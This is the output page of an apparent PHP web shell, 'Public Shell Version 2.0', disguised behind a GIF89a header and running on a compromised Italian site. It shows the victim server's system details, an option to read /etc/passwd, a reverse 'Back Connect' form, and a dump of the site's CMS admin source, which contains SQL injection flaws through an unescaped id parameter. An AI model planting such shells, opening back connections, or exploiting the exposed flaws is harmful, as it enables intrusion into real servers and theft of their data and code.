GIF89a

Public Shell

Uname : Linux hlpi1ws-c319s07.ad.aruba.it 5.15.0-130-generic #140-Ubuntu SMP Wed Dec 18 17:59:53 UTC 2024 x86_64
PHP Version : 5.3.29
Server Admin : postmaster@www.giancio.com
Server IP : 192.168.3.109 Your IP : 18.188.15.246
Safe Mode : Safe Mode is OFF
Read etc/passwd : Disabled Functions : PHP INFO
Back Connect
IP : PORt : '; Public Shell Version 2.0

Disable Functions: system,popen,dl,passthru,proc_open,shell_exec

Current Path : /web/htdocs/www.giancio.com/home/admin/function/

Current File : /web/htdocs/www.giancio.com/home/admin/function/content.php

<?php //////////////////////////CONTENUTI STATICI function listac() { $flag_colore = 0; global $conn, $id; $output = '<div class="row"> <div class="col-md-6"> <div class="headline"> <h3>' . LISTA . ' ' . CONT . '</h3> </div> </div> <div class="col-md-6"> <a href="?azione=inseriscic" class="btn btn-default pull-right"><i class="icon-plus"></i> Inserisci</a> <form class="form-search pull-right" enctype="multipart/form-data" action="?azione=resultc" method="post"> <div class="input-group"style="margin-right:10px"> <input class="form-control" type="text" name="ricerca"> <span class="input-group-btn"> <button class="btn btn-default" type="submit"><i class="icon-search"></i></button> </span> </div> </form> </div> </div>'; $output .= '<div class="row"> <div class="col-md-12"> <div class="table-wrapper"> <div class="wrapper-panel"> <table class="table table-striped" id="tab" > <thead> <tr> <th>Titolo</th> <th width="5%"></th> <th width="5%"></th> </tr> </thead> <tbody>'; $result=mysql_query('select * from pages order by pg_id ASC'); while($row=mysql_fetch_assoc($result)) { $output.='<tr> <td><a href="?azione=visualizzac&id='.$row['pg_id'].'"><i class="icon-signin"></i>  '.$row['pg_titolo'].'</a></td> <td><a title="Modifica" href="?azione=modificac&id='.$row['pg_id'].'"><i class="icon-edit"></i></a></td> <td><a class="right cancel show-option" title="Elimina" href="?azione=eliminac&id='.$row['pg_id'].'" onClick="return confirm(\'Sei sicuro di voler eliminare questo elemento?\');"><i class="icon-remove-sign"></i></a></td>'; $output.='</tr>'; } $output .= '</tbody> </table> </div> <div class="wrapper-paging pull-right"> <ul> <li><a class="paging-back"><</a></li> <li><a class="paging-this">Pagina <strong>0</strong> di <span>x</span></a></li> <li><a class="paging-next">></a></li> </ul> </div> <br /><br /> </div> </div> </div>'; return ($output); } //////////////////////////Visualizzazione Contenuti function visualizzac() { global $conn, $id; $result=mysql_query('select * from pages where pg_id='.$id.''); while($row=mysql_fetch_assoc($result)){ $output=' <div class="row"> <div class="col-md-6"> <div class="headline"> <h3>'.$row['pg_titolo'].'</h3> </div> </div> <div class="col-md-6"> <a href="?azione=modificac&id='.$row['pg_id'].'" class="btn btn-default pull-right"><i class="icon-edit"></i> Modifica</a> <a style="margin-right:10px" class="btn btn-default pull-right" href="javascript:history.back()"><i class="icon-reply"></i> Torna indietro</a> </div> </div>'; $output.=' <div class="row"> <div class="col-md-12 box"> <p>'.$row['pg_testo'].'</p> </div> <br /><br /> </div> '; } return ($output); } //////////////////////////risultato ricerca function resultc() { $flag_colore = 0; global $conn, $id; $result = mysql_real_escape_string($_POST['ricerca']); $output = '<div class="row"> <div class="col-md-6"> <div class="headline"> <h3>' . LISTA . ' ' . CONT . '</h3> </div> </div> <div class="col-md-6"> <a href="?azione=inseriscic" class="btn btn-default pull-right"><i class="icon-plus"></i> Inserisci</a> <form class="form-search pull-right" enctype="multipart/form-data" action="?azione=resultc" method="post"> <div class="input-group"style="margin-right:10px"> <input class="form-control" type="text" name="ricerca"> <span class="input-group-btn"> <button class="btn btn-default" type="submit"><i class="icon-search"></i></button> </span> </div> </form> </div> </div>'; $output .= '<div class="row"> <div class="col-md-12"> <div class="table-wrapper"> <div class="wrapper-panel"> <table class="table table-striped" id="tab" > <thead> <tr> <th>Titolo</th> <th width="5%"></th> <th width="5%"></th> </tr> </thead> <tbody>'; $result=mysql_query('select * from pages where pg_titolo like \'%' . $result . '%\' order by pg_id ASC'); if(mysql_num_rows($result)>0){ while($row=mysql_fetch_assoc($result)) { $output.='<tr> <td><a href="?azione=visualizzac&id='.$row['pg_id'].'"><i class="icon-signin"></i>  '.$row['pg_titolo'].'</a></td> <td><a title="Modifica" href="?azione=modificac&id='.$row['id'].'"><i class="icon-edit"></i></a></td> <td><a class="right cancel show-option" title="Elimina" href="?azione=eliminac&id='.$row['id'].'" onClick="return confirm(\'Sei sicuro di voler eliminare questo elemento?\');"><i class="icon-remove-sign"></i></a></td>'; $output.='</tr>'; } } else{ $output .= '<tr>'; $output .= '<td colspan="3">Nessun risultato corrispondente alla ricerca</td>'; $output .= '</tr>'; } $output .= '</tbody> </table> </div> <div class="wrapper-paging pull-right"> <ul> <li><a class="paging-back"><</a></li> <li><a class="paging-this">Pagina <strong>0</strong> di <span>x</span></a></li> <li><a class="paging-next">></a></li> </ul> </div> <br /><br /> </div> </div> </div>'; return ($output); } function inseriscic() { global $conn, $id; $output = '<div class="row"> <div class="col-md-10"> <div class="headline"> <h3>'.ADD.' '.CONT.'</h3> </div> </div> <div class="col-md-2"> <a class="btn btn-default pull-right" href="javascript:history.back()"><i class="icon-reply"></i> Torna indietro</a> </div> </div>'; $output .= '<form id="contactform" enctype="multipart/form-data" name="contactform" action="?azione=salvac&id=' . $id . '" method="post"> <div class="row"> <div class="col-md-6"> <label>Titolo</label> <input class="form-control" type="text" placeholder="Type something…" name="titolo"> </div> <div class="col-md-6"> <label>Title</label> <input class="form-control" type="text" placeholder="Type something…" name="titolo_en"> </div> </div> <br /> <div class="row"> <div class="col-md-6"> <label>Contenuto</label> <textarea class="span16 border-radius-none" rows="8" name="testo"></textarea> </div> <div class="col-md-6"> <label>Content</label> <textarea class="span16 border-radius-none" rows="8" name="descrizione_en"></textarea> </div> </div> <br /> <button class="btn btn-default" type="submit">Salva</button> <br /><br /> </form>'; return ($output); } function modificac() { global $conn, $id; $sql = 'select * from pages where pg_id="' . $id . '" '; $dati_pages = mysql_query($sql) or die(mysql_error()); $array_pages = mysql_fetch_array($dati_pages); $sql_en = 'select * from pages_en where pg_id="' . $id . '" '; $dati_pages_en = mysql_query($sql_en) or die(mysql_error()); $array_pages_en = mysql_fetch_array($dati_pages_en); $output = '<div class="row"> <div class="col-md-10"> <div class="headline"> <h3>'.MOD.' '.CONT.'</h3> </div> </div> <div class="col-md-2"> <a class="btn btn-default pull-right" href="javascript:history.back()"><i class="icon-reply"></i> Torna indietro</a> </div> </div>'; $output .= '<form id="contactform" enctype="multipart/form-data" name="contactform" action="?azione=salvac&id=' . $id . '" method="post"> <div class="row"> <div class="col-md-6"> <label>Titolo</label> <input class="form-control" type="text" placeholder="Type something…" name="titolo" value="'.$array_pages[pg_titolo].'"> </div> <div class="col-md-6"> <label>Title</label> <input class="form-control" type="text" placeholder="Type something…" name="titolo_en" value="'.$array_pages_en[pg_titolo].'"> </div> </div> <br /> <div class="row"> <div class="col-md-6"> <label>Contenuto</label> <textarea class="span16 border-radius-none" rows="8" name="testo">'.$array_pages[pg_testo].'</textarea> </div> <div class="col-md-6"> <label>Content</label> <textarea class="span16 border-radius-none" rows="8" name="descrizione_en">'.$array_pages_en[pg_testo].'</textarea> </div> </div> <br /> <button class="btn btn-default" type="submit">Salva</button> <br /><br /> </form>'; return ($output); return ($output); } function salvac() { global $conn, $id; $errore = 0; $titolo = mysql_real_escape_string($_POST['titolo']); $testo = mysql_real_escape_string($_POST['testo']); $titolo_en = mysql_real_escape_string($_POST['titolo_en']); $testo_en = mysql_real_escape_string($_POST['descrizione_en']); if ($errore == 0) { if ($id == 0) { $sql = 'insert into pages(pg_titolo, pg_testo) values("' . $titolo . '","' . $testo . '")'; mysql_query($sql, $conn) or die(mysql_error()); $sql_en = 'insert into pages_en(pg_titolo, pg_testo) values("' . $titolo_en . '","' . $testo_en . '")'; mysql_query($sql_en, $conn) or die(mysql_error()); header('location: cms.php?ins&azione=listac'); $id = mysql_insert_id(); } else { $sql = 'update pages set pg_titolo="' . $titolo . '", pg_testo="' . $testo . '" where pg_id="' . $id . '" '; mysql_query($sql, $conn) or die(mysql_error()); $sql_en = 'update pages_en set pg_titolo="' . $titolo_en . '", pg_testo="' . $testo_en . '" where pg_id="' . $id . '" '; mysql_query($sql_en, $conn) or die(mysql_error()); header('location: cms.php?agg&azione=listac'); } } else {$output = 'errore nel form.<br /><a href="javascript:history.go(-1)">Torna indietro</a>'; } return ($output); } function eliminac() { global $conn, $id; $sql = 'delete from pages where pg_id="' . $id . '"'; mysql_query($sql) or die(mysql_error()); $sql_en = 'delete from pages_en where pg_id="' . $id . '"'; mysql_query($sql_en) or die(mysql_error()); header('location: cms.php?del&azione=listac'); } ?>

Public Shell Version 2.0